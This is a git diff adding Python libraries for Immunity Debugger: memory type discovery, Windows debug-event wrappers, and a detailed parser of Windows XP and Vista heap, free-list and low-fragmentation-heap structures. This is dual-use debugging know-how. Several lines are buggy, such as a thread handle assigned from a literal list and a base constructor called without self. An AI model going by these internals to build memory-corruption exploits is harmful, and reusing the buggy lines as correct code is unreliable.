+ @param what: (Optional, Def: ALL) What to search for: all, pointers, strings, asciistrings, unicodestrings, doublelinkedlists, exploitable
+
+ @rtype: List of Discovered Object
+ @return: A list of Discovered Objects
+ """
+
+ mem = self.imm.readMemory( address, size )
+ if not mem:
+ return []
+ return self.Discover( mem, address, iterate, what )
+
+ def Discover(self, mem, address, iterate = 4, what = 'all'):
+ """
+ Discover types on Memory Space
+
+ @type mem: Buffer
+ @param mem: Memory to discover
+
+ @type address: DWORD
+ @param address: RVA of the memory
+
+ @type iterate: Integer
+ @param iterate: (Optional, Def: 4) Iterate through given bytes
+
+ @type what: STRING
+ @param what: (Optional, Def: ALL) What to search for: all, pointers, strings, asciistrings, unicodestrings, doublelinkedlists, exploitable
+
+ @rtype: List of Discovered Object
+ @return: A list of Discovered Objects
+ """
+ # Discover types on memory space
+ ndx = 0
+ discovered = []
+
+ try:
+ Functions = self.DiscoverWhat[ what.lower() ]
+ except KeyError:
+ return []
+
+ while ndx < len(mem):
+ obj = None
+ #self.imm.Log("Discovering... 0x%02x" % ndx, address = address + ndx)
+ for discover_func, tipo in Functions:
+
+ if tipo == MEM:
+ obj = discover_func(address + ndx, mem[ndx: ] )
+
+ elif tipo == DWORD:
+ if len( mem[ndx:ndx+4] ) >= 4:
+ dword = struct.unpack("L", mem[ ndx : ndx+4 ] )[0]
+ obj = discover_func(address + ndx, dword )
+
+ if obj:
+ break
+ if obj:
+ discovered.append( obj )
+ ndx += obj.getSize() # align this address by iterate
+ # round by iterate
+ if ndx % iterate:
+ ndx = iterate + ndx & ~(iterate-1)
+
+ else:
+ ndx += iterate
+
+ return discovered
+
+ def isUnicode(self, address, mem, max_size = 4*2):
+ ret = []
+ for a in range(0, len(mem), 2):
+ ndx = struct.unpack("H", mem[ a: a + 2 ] )[0]
+ if ndx & 0xFF00:
+ return False
+
+ if not (ctable[ ndx & 0x00FF ] & PLAINASCII):
+ break
+ ret.append( chr( ndx & 0x00FF ) )
+
+ if a < max_size:
+ return None
+
+ if ndx == 0x0000:
+ ret.append(" ")
+
+ return Unicode(address, "".join(ret) )
+
+ def isString(self, address, mem, max_size = 4):
+
+ for a in range(0, len(mem)):
+ ndx = ord( mem[ a ] )
+ if not (ctable[ ndx ] & PLAINASCII):
+ break
+ #if ( ndx < 0x20 or ndx > 0x7e) and ndx not in (0x9, 0xa, 0xd):
+ # break
+
+ if a < max_size:
+ return None
+ if ndx == 0x0:
+ a+=1
+ return String(address, mem[0 : a] )
+
+
+ def isPointer(self, address, dword):
+ try:
+ ret = self.imm.readLong(dword)
+ except Exception:
+ return None
+ p = Pointer( address, dword )
+ mem = self.imm.getMemoryPagebyAddress(dword)
+ if mem:
+ p.setMemPage( mem )
+ return p
+
+ def isDoubleLinkedList(self, address, mem):
+ if len(mem) < 8:
+ return False
+ ptr1 = immutils.str2littleendian( mem[0 : 4] )
+ ptr2 = immutils.str2littleendian( mem[4 : 8] )
+ try:
+ ptr1_dword = self.imm.readLong( ptr1 )
+ ptr1_dword2 = self.imm.readLong( ptr1 + 4 )
+ ptr2_dword = self.imm.readLong( ptr2 )
+ ptr2_dword2 = self.imm.readLong( ptr2 + 4 )
+ except Exception:
+ return False
+
+ if (address == ptr1_dword or address == ptr1_dword2) and\
+ (address == ptr2_dword or address == ptr2_dword2):
+ dl = DoubleLinkedList ( address, (ptr1, ptr2) )
+ return dl
+
+ return False
+
+ def isFormatString(self):
+ pass
+
+
+
+if __name__ == '__main__':
+ d = DataTypes()
+ assert(d.isString("ho\nA\x01") == True)
+ assert(d.isString("\x01COCA") == False)
+
diff --git a/1.73/Libs/libevent.py b/1.73/Libs/libevent.py
new file mode 100755
index 0000000..d61564f
--- /dev/null
+++ b/1.73/Libs/libevent.py
@@ -0,0 +1,238 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+
+"""
+
+__VERSION__ = '1.0'
+import debugger
+
+class Event:
+ def __init__( self, event ):
+ self.dwDebugEventCode = event[0][0]
+ self.dwProcessId = event[0][1]
+ self.dwThreadId = event[0][2]
+ self._GetValues(event)
+
+ def isCreateProcess(self):
+ return self.dwDebugEventCode == debugger.CREATE_PROCESS_DEBUG_EVENT
+
+ def isCreateThread(self):
+ return self.dwDebugEventCode == debugger.CREATE_THREAD_DEBUG_EVENT
+
+ def isException(self):
+ return self.dwDebugEventCode == debugger.EXCEPTION_DEBUG_EVENT
+
+ def isExitProcess(self):
+ return self.dwDebugEventCode == debugger.EXIT_PROCESS_DEBUG_EVENT
+
+ def isExitThread(self):
+ return self.dwDebugEventCode == debugger.EXIT_THREAD_DEBUG_EVENT
+
+ def isLoadDll(self):
+ return self.dwDebugEventCode == debugger.LOAD_DLL_DEBUG_EVENT
+
+ def isOutputDebugString(self):
+ return self.dwDebugEventCode == debugger.OUTPUT_DEBUG_STRING_EVENT
+
+ def isUnloadDll(self):
+ return self.dwDebugEventCode == debugger.UNLOAD_DLL_DEBUG_EVENT
+
+ def isRipEvent(self):
+ return self.dwDebugEventCode == debugger.RIP_EVENT
+
+ def _GetValues(self, event):
+ return
+
+class CreateProcessEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.hFile = event[1][0]
+ self.hProcess = event[1][1]
+ self.hThread = event[1][2]
+ self.lpBaseOfImage = event[1][3]
+ self.dwDebugInfoFileOffset = event[1][4]
+ self.nDebugInfoSize = event[1][5]
+ self.lpThreadLocalBase = event[1][6]
+ self.lpStartAddress = event[1][7]
+ self.lpImageName = event[1][8]
+ self.fUnicode = event[1][9]
+
+class CreateThreadEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.hThread = [1][0]
+ self.lpStartAddress = event[1][1]
+ self.lpThreadLocalBase = event[1][2]
+
+EXCEPTION_CODE = {debugger.EXCEPTION_BREAKPOINT: "Breakpoint",
+ debugger.EXCEPTION_SINGLE_STEP:"SingleStep",
+ debugger.EXCEPTION_ACCESS_VIOLATION:"AccessViolation",
+ debugger.EXCEPTION_GUARD_PAGE: "GuardPage",
+ debugger.EXCEPTION_ARRAY_BOUNDS_EXCEEDED: "ArrayBoundsExceeded",
+ debugger.EXCEPTION_FLT_DENORMAL_OPERAND: "FltDenormalOperand",
+ debugger.EXCEPTION_FLT_DIVIDE_BY_ZERO: "FltDivideByZero",
+ debugger.EXCEPTION_FLT_INEXACT_RESULT: "FltInexactResult",
+ debugger.EXCEPTION_FLT_INVALID_OPERATION: "FltInvalidOperation",
+ debugger.EXCEPTION_FLT_OVERFLOW: "FltOverflow",
+ debugger.EXCEPTION_FLT_STACK_CHECK: "FltStackCheck",
+ debugger.EXCEPTION_FLT_UNDERFLOW: "FltUnderflow",
+ debugger.EXCEPTION_INT_DIVIDE_BY_ZERO: "IntDivideByZero",
+ debugger.EXCEPTION_INT_OVERFLOW: "IntOverflow",
+ debugger.EXCEPTION_PRIV_INSTRUCTION: "PrivInstruction",
+ debugger.EXCEPTION_ILLEGAL_INSTRUCTION: "IllegalInstruction",
+ debugger.EXCEPTION_NONCONTINUABLE_EXCEPTION: "NonContinuableException",
+ debugger.EXCEPTION_STACK_OVERFLOW: "StackOverflow"
+ }
+
+class ExceptionRecord:
+ def __init__(self, er):
+ self.ExceptionCode = er [0]
+ self.ExceptionFlags = er [1]
+ self.ExceptionAddress = er [2]
+ self.NumberParameters = er [3]
+ self.ExceptionInformation = er [4]
+ self.ExceptionRecord = er [5]
+
+ def isAccessViolationOnExecute(self):
+ return self.isAccessViolation() and self.ExceptionInformation[0] != 1 and self.ExceptionInformation[0] == self.ExceptionAddress
+
+ def isAccessViolationOnWrite(self):
+ return self.isAccessViolation() and self.ExceptionInformation[0] == 1
+
+ def isAccessViolationOnRead(self):
+ return self.isAccessViolation() and self.ExceptionInformation[0] != 1 and self.ExceptionInformation[0] != self.ExceptionAddress
+
+ def isBreakpoint(self):
+ return self.ExceptionCode == debugger.EXCEPTION_BREAKPOINT
+
+ def isSingleStep(self):
+ return self.ExceptionCode == debugger.EXCEPTION_SINGLE_STEP
+
+ def isAccessViolation(self):
+ return self.ExceptionCode == debugger.EXCEPTION_ACCESS_VIOLATION
+
+ def isGuardPage(self):
+ return self.ExceptionCode == debugger.EXCEPTION_GUARD_PAGE
+
+ def isArrayBoundsExceeded(self):
+ return self.ExceptionCode == debugger.EXCEPTION_ARRAY_BOUNDS_EXCEEDED
+
+ def isFltDenormalOperand(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_DENORMAL_OPERAND
+
+ def isFltDivideByZero(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_DIVIDE_BY_ZERO
+
+ def isFltInexactResult(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_INEXACT_RESULT
+
+ def isFltInvalidOperation(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_INVALID_OPERATION
+
+ def isFltOverflow(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_OVERFLOW
+
+ def isFltStackCheck(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_STACK_CHECK
+
+ def isFltUnderflow(self):
+ return self.ExceptionCode == debugger.EXCEPTION_FLT_UNDERFLOW
+
+ def isIntDivideByZero(self):
+ return self.ExceptionCode == debugger.EXCEPTION_INT_DIVIDE_BY_ZERO
+
+ def isIntOverflow(self):
+ return self.ExceptionCode == debugger.EXCEPTION_INT_OVERFLOW
+
+ def isPrivInstruction(self):
+ return self.ExceptionCode == debugger.EXCEPTION_PRIV_INSTRUCTION
+
+ def isIllegalInstruction(self):
+ return self.ExceptionCode == debugger.EXCEPTION_ILLEGAL_INSTRUCTION
+
+ def isNonContinuableException(self):
+ return self.ExceptionCode == debugger.EXCEPTION_NONCONTINUABLE_EXCEPTION
+
+ def isExceptionStackOverflow(self):
+ return self.ExceptionCode == debugger.EXCEPTION_STACK_OVERFLOW
+
+ def getType(self):
+ try:
+ return EXCEPTION_CODE[self.ExceptionCode]
+ except KeyError:
+ return "UknownException"
+
+ def __str__(self):
+ return self.getType()
+
+
+class ExceptionEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.dwFirstChance = event[1][0]
+ self.Exception = []
+ for er in range(1, len(event[1])):
+ self.Exception.append( ExceptionRecord(event[1][er]) )
+
+class ExitProcessEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.dwExitCode = event[1][0]
+
+class ExitThreadEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.dwExitCode = event[1][0]
+
+class LoadDLLEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.hFile = event[1][0]
+ self.lpBaseOfDll = event[1][1]
+ self.dwDebugInfoFileOffset = event[1][2]
+ self.nDebugInfoSize = event[1][3]
+ self.lpImageName = event[1][4]
+ self.fUnicode = event[1][5]
+
+class OutputDebugEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.lpDebugStringData = event[1][0]
+ self.fUnicode = event[1][1]
+ self.nDebugStringLength = event[1][2]
+
+class RIPEvent(Event):
+ def __init__(self, event):
+ Event.__init__(self, event)
+
+ def _GetValues(self, event):
+ self.dwError = event[1][0]
+ self.dwType = event[1][1]
+
+class UnloadDLLEvent(Event):
+ def __init__(self, event):
+ Event.__init__(event)
+
+ def _GetValues(self, event):
+ self.lpBaseOfDll = event[1][0]
diff --git a/1.73/Libs/libheap.py b/1.73/Libs/libheap.py
new file mode 100755
index 0000000..872c3f9
--- /dev/null
+++ b/1.73/Libs/libheap.py
@@ -0,0 +1,957 @@
+#!/usr/bin/env python
+"""
+Immunity Heap API for Immunity Debugger
+
+(c) Immunity, Inc. 2004-2006
+
+
+U{Immunity Inc.} Debugger Heap Library for python
+
+
+"""
+
+__VERSION__ = '1.3'
+
+import immutils
+import struct
+import string
+from UserList import UserList
+HEAP_MAX_FREELIST = 0x80
+
+
+
+class PHeap:
+ def __init__(self, imm, heapddr = 0, restore = False):
+ """
+ Windows 32 Heap Class
+
+ @rtype: PHEAP object
+ """
+ self.imm = imm
+ self.address = heapddr
+ self.chunks = []
+ self.restore = restore
+ self.Segments = []
+ if heapddr:
+ self._grabHeap()
+
+
+
+ def _grabHeap(self):
+ try:
+ heaps = self.imm.readMemory( self.address, 0x588 )
+ except WindowsError, msg:
+ raise Exception, "Failed to get heap at address : 0x%08x" % heapaddr
+
+ index = 0x8
+ (self.Signature, self.Flags, self.ForceFlags, self.VirtualMemoryThreshold,\
+ self.SegmentReserve, self.SegmentCommit, self.DeCommitFreeBlockThreshold, self.DeCommitTotalBlockThreshold,\
+ self.TotalFreeSize, self.MaximumAllocationSize, self.ProcessHeapListIndex, self.HeaderValidateLength,\
+ self.HeaderValidateCopy,self.NextAvailableTagIndex, self.MaximumTagIndex, self.TagEntries, \
+ self.UCRSegments, self.UnusedUnCommittedRanges, self.AlignRound, self.AlignMask) =\
+ struct.unpack("LLLLLLLLLLHHLHHLLLLL", heaps[ index : index + (0x50-8) ])
+
+ index+= 0x50-8
+ self.VirtualAllocedBlock = struct.unpack("LL", heaps[ index : index + 8 ])
+ index+=8
+ self._Segments = struct.unpack("L" * 64, heaps[ index: index+ 64*4 ])
+ index+=64*4
+ self.FreeListInUseLong = struct.unpack("LLLL" , heaps[ index : index + 16 ])
+ index+=16
+ (self.FreeListInUseTerminate,self.AllocatorBackTraceIndex) = struct.unpack("HH", heaps[ index : index + 4 ])
+ index+=4
+ self.Reserved1= struct.unpack("LL", heaps[ index : index + 8 ])
+ index+=8
+ self.PseudoTagEntries= struct.unpack("L", heaps[ index : index + 4])
+ index+=4
+ self.FreeList=[]
+
+ # Getting the FreeList
+ for a in range(0, 128):
+ free_entry = []
+ # Previous and Next Chunk of the head of the double linked list
+ (prev, next) = struct.unpack("LL", heaps[ index + a*8 : index + a*8 + 8 ])
+
+ free_entry.append((self.address + index+ a * 8, prev, next))
+ base_entry = self.address + index + a * 8
+
+ # Loop over the Double Linked List until next == to the begging of the list.
+ while next != base_entry:
+ tmp = next
+ try:
+ (prev,next) = struct.unpack("LL", self.imm.readMemory(next, 0x8))
+ except:
+ break
+
+ free_entry.append( (tmp, prev,next) )
+
+ self.FreeList.append(free_entry)
+
+ index+=256*4
+ (self.LockVariable, self.CommitRoutine, self.Lookaside, self.LookasideLockCount)=\
+ struct.unpack("LLLL", heaps[index:index+16])
+
+ # the first segment is the heap on the base address (the 2nd chunk)
+ #self.Segments.
+ for a in range(0, 64):
+ if self._Segments[a] == 0x0:
+ break
+ s = Segment( self.imm, self._Segments[a] )
+ self.Segments.append( s )
+ #imm.Log("Segment[%d]: 0x%08x" % (a, self.Segments[a]))
+ # BaseAddress
+ if self.restore:
+ self.getRestoredChunks( s.BaseAddress )
+ else:
+ self.getChunks( s.BaseAddress )
+ for idx in s.Pages:
+ self.imm.Log("> 0x%08x" % idx)
+ if self.restore:
+ self.getRestoredChunks( idx )
+ else:
+ self.getChunks( idx )
+
+ def printFreeListInUse(self, uselog=None):
+ """
+ Print the Heap's FreeListInUse bitmask
+
+ @type uselog: Log Function
+ @param uselog: (Optional, Def: Log Window) Log function that display the information
+ """
+ tbl= ["FreeListInUse %s %s"% (immutils.decimal2binary(self.FreeListInUseLong[0]), immutils.decimal2binary(self.FreeListInUseLong[1])),\
+ " %s %s" % (immutils.decimal2binary(self.FreeListInUseLong[2]), immutils.decimal2binary(self.FreeListInUseLong[3]))]
+ if uselog:
+ for a in tbl:
+ uselog(a)
+ return tbl
+
+ def printFreeList(self, uselog = None):
+ """
+ Print the Heap's FreeList
+
+ @type uselog: Log Function
+ @param uselog: (Optional, Def: Log Window) Log function that display the information
+ """
+ log = self.imm.Log
+ if uselog:
+ log = uselog
+ for a in range(0, 128):
+ entry= self.FreeList[a]
+ e=entry[0]
+
+ log("[%03x] 0x%08x -> [ 0x%08x | 0x%08x ] " % (a, e[0], e[1], e[2]), address = e[0])
+ for e in entry[1:]:
+ try:
+ sz = self.get_chunk( e[0] - 8 ).size
+ except:
+ sz = 0
+ log(" 0x%08x -> [ 0x%08x | 0x%08x ] (%08x)" % (e[0], e[1], e[2], sz), address= e[0])
+ return 0x0
+
+ # Get Chunnks restored
+ def getRestoredChunks(self, address):
+ """
+ Enumerate Chunks of the current heap using a restore heap
+
+ @type address: DWORD
+ @param address: Address where to start getting chunks
+
+ @rtype: List of win32heapchunks
+ @return: Chunks
+ """
+
+ imm = self.imm
+
+ oldheap = imm.getKnowledge("saved_heap_%08x" % self.address) #retriving the heap
+ if not oldheap:
+ imm.Log("Coudln't use restore mode: No saved Heap")
+ return self.getChunks(address)
+
+ ptr = address
+ # null chunk
+ backchunk = self.get_chunk(imm, ptr, self.address)
+
+ backchunk.size = backchunk.psize
+ backchunk.usize = backchunk.upsize
+
+ while 1:
+
+ try:
+ c = self.get_chunk(imm, ptr, self.address)
+ except:
+ return self.chunks
+
+ #ptr+= c.size * 8
+ next = ptr + c.usize
+
+ try:
+ sizes = imm.readLong( next )
+ previous = (sizes>>16) & 0xffff
+ except Exception:
+ previous = 0 # unable to read
+
+ # When to restore?
+ # o Chunk size is zero
+ # o Chunk previous size is zero
+ # o When Size is different from next chunk previous size
+ # o Next chunk previous size is zero (means, readLong fails) and the chunk is not a top chunk
+ # o When the size of the backward chunk is different for the chunk Size
+ if (not c.size) or (c.size != previous and not c.istop()) or (not previous and not c.istop()) or (backchunk.size != c.psize) :
+ restoredchunk = oldheap.findChunkByAddress(ptr)
+
+ if restoredchunk:
+ c = restoredchunk
+ c.setRestored()
+ next = ptr + c.usize
+ ptr = next
+ self.chunks.append(c)
+ backchunk = c
+
+
+ if c.istop() or c.size == 0:
+ break
+
+ backchunk = c
+
+ return self.chunks
+
+ def findChunkByAddress(self, addr):
+ """
+ Find a Chunks by its address
+
+ @type address: DWORD
+ @param address: Address to search for
+
+ @rtype: win32heapchunks
+ @return: Chunk
+ """
+
+ for a in self.chunks:
+ if a.addr == addr:
+ return a
+ return None
+
+ def getChunks(self, address, size = 0xffffffffL):
+ """
+ Enumerate Chunks of the current heap
+
+ @type address: DWORD
+ @param address: Address where to start getting chunks
+
+ @type size: DWORD
+ @param size: (Optional, Def: All) Amount of chunks
+
+ @rtype: List of win32heapchunks
+ @return: Chunks
+ """
+ imm = self.imm
+
+ ptr = address
+
+ while size:
+
+ try:
+ c = self.get_chunk( ptr )
+ except Exception, msg:
+ imm.Log("Failed to grab chunks> " + str(msg) )
+ return self.chunks
+
+ self.chunks.append(c)
+
+ #c.printchunk()
+ ptr+= c.usize
+ if c.istop() or c.size == 0:
+ break
+ size -= 1
+
+ return self.chunks
+
+ def get_chunk(self, addr):
+ return win32heapchunk(self.imm, addr, self)
+
+class Segment:
+ def __init__(self, imm, addr):
+ self.address = addr
+ addr += 8 # AVOID THE ENTRY ITSELF
+ mem = imm.readMemory(addr, 0x34)
+
+ (self.Signature, self.Flags, self.Heap, self.LargestUnCommitedRange, self.BaseAddress,\
+ self.NumberOfPages, self.FirstEntry, self.LastValidEntry, self.NumberOfUnCommittedPages,\
+ self.NumberOfUnCommittedRanges, self.UnCommittedRanges, self.AllocatorBackTraceIndex,\
+ self.Reserved, self.LastEntryInSegment) = struct.unpack("LLLLLLLLLLLHHL", mem)
+ #imm.Log("SEGMENT: 0x%08x Sig: %x" % (self.address, self.Signature), address = self.address )
+ #imm.Log("Heap: %08x LargetUncommit %08x Base: %08x" % (self.Heap, self.LargestUnCommitedRange, self.BaseAddress))
+ #imm.Log("NumberOfPages %08x FirstEntry: %08x LastValid: %08x" % (self.NumberOfPages, self.FirstEntry, self.LastValidEntry))
+ #imm.Log("Uncommited: %08x" % self.UnCommittedRanges)
+ self.Pages = []
+ if self.UnCommittedRanges:
+ i = 0
+ addr = self.UnCommittedRanges
+ while addr != 0:
+ mem = imm.readMemory( addr, 0x10 )
+ ( C_Next, C_Addr, C_Size, C_Filler) = struct.unpack( "LLLL", mem )
+ #imm.Log( ">> Memory: 0x%08x Address: 0x%08x (a: %08x) Size: %x" % ( addr, C_Next, C_Addr,C_Size) )
+ self.Pages.append( C_Addr + C_Size )
+ addr = C_Next
+
+class VistaPHeap(PHeap):
+ LFH = None
+ def __init__(self, imm, heapddr = 0, restore = False):
+ PHeap.__init__(self, imm, heapddr, restore)
+
+ def _grabHeap(self):
+ try:
+ heapmem = self.imm.readMemory( self.address + 8 , 0x120 )
+ except WindowsError, msg:
+ raise Exception, "Failed to get heap at address : 0x%08x" % heapaddr
+ index = 8
+ (self.SegmentSignature, self.SegmentFlags, self.SegmentListEntry_Flink, self.SegmentListEntry_Blink, self.Heap, self.BaseAddress, self.NumberOfPages, self.FirstEntry, self.LastValidEntry, self.NumberofUncommitedPages, self.NumberofUncommitedRanges, self.SegmentAllocatorBackTraceIndex, self.Reserved, self.UCRSegmentList_Flink, self.UCRSegmentList_Blink, self.Flags, self.ForceFlags, self.CompatibilityFlags, self.EncodeFlagMask, self.EncodingKey, self.EncodingKey2, self.PointerKey, self.Interceptor_debug, self.VirtualMemoryThreshold, self.Signature, self.SegmentReserve, self.SegmentCommit, self.DeCommitThresholdBlock, self.DeCommitThresholdTotal, self.TotalFreeSize, self.MaxAllocationSize, self.ProcessHeapsListIndex, self.HeaderValidateLength, self.HeaderValidateCopy, self.NextAvailableTagIndex, self.MaximumTagIndex, self.TagEntries, self.UCRList_Flink, self.UCRList_Blink, self.AlignRound, self.AlignMask, self.VirtualAlloc_Flink, self.VirtualAlloc_Blink, self.SegmentList_Flink, self.SegmentList_Blink, self.AllocatorBackTraceIndex, self.NonDedicatedListLenght, self.BlocksIndex, self.UCRIndex, self.PseudoTagEntries, self.FreeList_Flink, self.FreeList_Blink, self.LockVariable, self.CommitRoutine, self.FrontEndHeap, self.FrontHeapLockCount, self.FrontEndHeapType, self.TotalMemoryReserved, self.TotalMemoryCommited, self.TotalMemoryLargeUCR, self.TotalSizeInVirtualBlocks, self.TotalSegments, self.TotalUCRs, self.CommitOps, self.DecommitOps, self.LockAcquires, self.LockCollisions, self.CommitRate, self.DeCommitRate, self.CommitFailures, self.InBlockCommitFailures, self.CompactHeapCalls, self.CompactedUCRs, self.InBlockDecommits, self.InBlockDecommitSize, self.TunningParameters) = struct.unpack("L" * 11 + "HH" + "L" *18 + "HHLHH" + "L" * 19 + "HH" + "L" * 19, heapmem)
+ head = self.address #+0x10
+ addr = self.SegmentListEntry_Flink
+ self.Segments.append( VistaSegment( self.imm, self.address) )
+ self.getChunks( self.address )
+
+ while head != (addr& ~0xff):
+ self.Segments.append( VistaSegment(self.imm, addr - 0x10 ) )
+ self.getChunks( addr & ~0xff )
+ addr = self.imm.readLong( addr )
+
+ self.getBlocks( self.BlocksIndex )
+ if self.FrontEndHeap:
+ self.LFH = LFHeap( self.imm, self.FrontEndHeap )
+
+ def getBlocks(self, startaddr):
+ self.blocks = []
+ addr = startaddr
+
+ while addr:
+ block = Blocks( self.imm, addr )
+ self.blocks.append( block )
+ block.FreeList=[]
+ memory = self.imm.readMemory( block.Buckets, 0x80*8 )
+ if block.FreeListInUsePtr:
+ block.setFreeListInUse( struct.unpack("LLLL", self.imm.readMemory( block.FreeListInUsePtr, 4*4 )) )
+
+ # Getting the FreeList
+ for a in range(0, 128):
+ free_entry = []
+ # Previous and Next Chunk of the head of the double linked list
+ (fwlink, heap_bucket) = struct.unpack("LL", memory[a *8 : a *8 + 8] )
+ if fwlink:
+ try:
+ (next, prev) = struct.unpack("LL", self.imm.readMemory( fwlink, 8) )
+ except:
+ next, prev = (0,0)
+ self.imm.Log("Error with 0x%x" % fwlink)
+ free_entry.append( (fwlink, next, prev) )
+ base_entry = fwlink
+
+ while next and next != base_entry:
+ tmp = next
+ chunk = win32vistaheapchunk( self.imm, next - 8, self )
+
+ if a == 127:
+ if chunk.size <= a:
+ break
+ else:
+ if chunk.size != a:
+ break
+
+ next = chunk.nextchunk
+ free_entry.append( (tmp, chunk.nextchunk, chunk.prevchunk) )
+
+ else:
+ free_entry = [ (fwlink, 0x0, 0x0) ]
+
+ #if heap_bucket & 1:
+ # bucket = self.getBucket( heap_bucket - 1 )
+ block.FreeList.append(free_entry)
+
+ addr = block.FwLink
+
+ def get_chunk(self, addr):
+ return win32vistaheapchunk(self.imm, addr, self)
+
+ def printFreeList(self, uselog = None):
+ """
+ Print the Heap's FreeList
+
+ @type uselog: Log Function
+ @param uselog: (Optional, Def: Log Window) Log function that display the information
+ """
+ log = self.imm.Log
+ if uselog:
+ log = uselog
+ for block in self.blocks:
+ f = block.FreeListInUse
+ log("** Block 0x%08x StartSize: %d MaxSize: %d CtrZone: %d **" % ( block.address, block.StartSize, block.MaxSize, block.CtrZone ) )
+ log("FreeListInUse: %s %s" % (immutils.decimal2binary(f[0]),\
+ immutils.decimal2binary(f[1]) ) )
+ log(" %s %s" % (immutils.decimal2binary(f[2]),\
+ immutils.decimal2binary(f[3]) ) )
+
+ for a in range(0, 128):
+ entry= block.FreeList[a]
+ e=entry[0]
+ if e[0]:
+ log("[%03d] 0x%08x -> [ 0x%08x | 0x%08x ] " % (a, e[0], e[1], e[2]), address = e[0])
+ for e in entry[1:]:
+ log(" 0x%08x -> [ 0x%08x | 0x%08x ] " % (e[0], e[1], e[2]), address= e[0])
+ return 0x0
+
+class VistaSegment:
+ def __init__(self, imm, addr):
+
+ self.address = addr
+ addr += 8 # AVOID THE ENTRY ITSELF
+ mem = imm.readMemory(addr+8, 0x38)
+
+ (self.SegmentSignature, self.SegmentFlags, self.SegmentListEntry_Flink, self.SegmentListEntry_Blink,\
+ self.Heap, self.BaseAddress, self.NumberOfPages, self.FirstEntry, self.LastValidEntry,\
+ self.NumberofUncommitedPages, self.NumberofUncommitedRanges, self.SegmentAllocatorBackTraceIndex,\
+ self.Reserved,self.UCRSegmentList_Flink,self.UCRSegmentList_Blink)=\
+ struct.unpack( "L" * 11 + "HH" + "L" *2, mem)
+ self.Entry = win32vistaheapchunk(imm, addr)
+
+
+class LFHeap:
+ def __init__(self, imm, addr):
+ mem = imm.readMemory( addr, 0x300 )
+ if not mem:
+ raise Exception, "Can't read Low Fragmentation Heap at 0x%08x" % addr
+ index = 0
+ self.address = addr
+ imm.Log("Low Fragmented Heap: 0x%08x" % addr)
+ (self.Lock, self.field_4, self.field_8, self.field_c,\
+ self.field_10, field_14, self.SubSegmentZone_Flink,
+ self.SubSegmentZone_Blink, self.ZoneBlockSize,\
+ self.Heap, self.SegmentChange, self.SegmentCreate,\
+ self.SegmentInsertInFree, self.SegmentDelete, self.CacheAllocs,\
+ self.CacheFrees) = struct.unpack("L" * 0x10, mem[ index : index +0x40 ])
+ index += 0x40
+ self.UserBlockCache = []
+ for a in range(0,12):
+ umc = UserMemoryCache( addr + index, mem[ index : index + 0x10] )
+ index+= 0x10
+ self.UserBlockCache.append( umc )
+ self.Buckets = []
+ for a in range(0, 128):
+ entry = mem[ index : index + 4 ]
+ b = Bucket( addr + index, entry)
+ index = index + 4
+ self.Buckets.append( b )
+
+ self.LocalData = LocalData(imm, addr + index )
+
+class LocalData:
+ def __init__(self, imm, addr):
+ self.address = addr
+
+ mem = imm.readMemory( addr, 0x18 + 0x68*128 )
+ (self.Next, self.Depth, self.Seq, self.CtrZone, self.LowFragHeap,\
+ self.Sequence1, self.Sequence2) = struct.unpack("LHHLLLL", mem[:0x18])
+ index = 0x18
+ self.SegmentInfo = []
+ for a in range(0, 128):
+ l = LocalSegmentInfo( imm, self.address + index,\
+ mem[ index : index + 0x68] )
+ index+= 0x68
+ self.SegmentInfo.append( l )
+
+# What the real size of this, it is 0x64 or 0x68?
+class LocalSegmentInfo:
+ def __init__(self, imm, addr, mem = ""):
+ self.address = addr
+ self.SubSegment = []
+ self.imm = imm
+ if not mem:
+ mem = imm.readMemory( self.address, 0x68 )
+
+ (self.Hint, self.ActiveSubsegment) = struct.unpack("LL", mem[0:8] )
+ index = 8
+ self.CachedItems = struct.unpack("L" * 0x10, mem[ index : index + 0x10*4])
+ index += 0x10*4
+ (self.Next, self.Depth, self.Seq, self.TotalBlocks,\
+ self.SubSegmentCounts, self.LocalData, self.LastOpSequence,\
+ self.BucketIndex, self.LastUsed, self.Reserved) = struct.unpack("LHHLLLLHHL", mem[index: index + 0x20])
+
+ if self.Hint:
+ self.SubSegment.append( self.getSubSegment( self.Hint, "Hint" ) )
+ if self.ActiveSubsegment and self.ActiveSubsegment != self.Hint:
+ self.SubSegment.append( self.getSubSegment( self.ActiveSubsegment, "ActiveSS") )
+ for a in range( 0, len(self.CachedItems) ):
+ item = self.CachedItems[a]
+ if item and item not in (self.Hint, self.ActiveSubsegment):
+ self.SubSegment.append( self.getSubSegment( item, "Cache_%02x" % a) )
+
+
+
+ def getSubSegment(self, address, type = ""):
+ return SubSegment(self.imm, address, type)
+
+class SubSegment:
+ def __init__(self, imm, address, type=""):
+ self.address = address
+ self.type = type
+ self.chunks = []
+ mem = imm.readMemory( address, 0x20 )
+ (self.LocalInfo, self.UserBlocks, self.AggregateExchg,\
+ self.Aggregate_Sequence, self.BlockSize, self.Flags,\
+ self.BlockCount, self.SizeIndex, self.AffinityIndex,
+ self.Next, self.Lock) = struct.unpack("LLLLHHHBBLL", mem)
+ self.Offset = self.AggregateExchg >> 0xD
+ self.Offset = self.Offset & 0x7FFF8
+ self.Depth = self.AggregateExchg & 0xFFFF
+ #imm.Log("UserBlock %s: 0x%08x size: %x offset: %x Depth: %x (0x%08x)" % ( self.type, self.UserBlocks, self.BlockSize, self.Offset, self.Depth, self.Next), address = self.UserBlocks)
+ if self.UserBlocks:
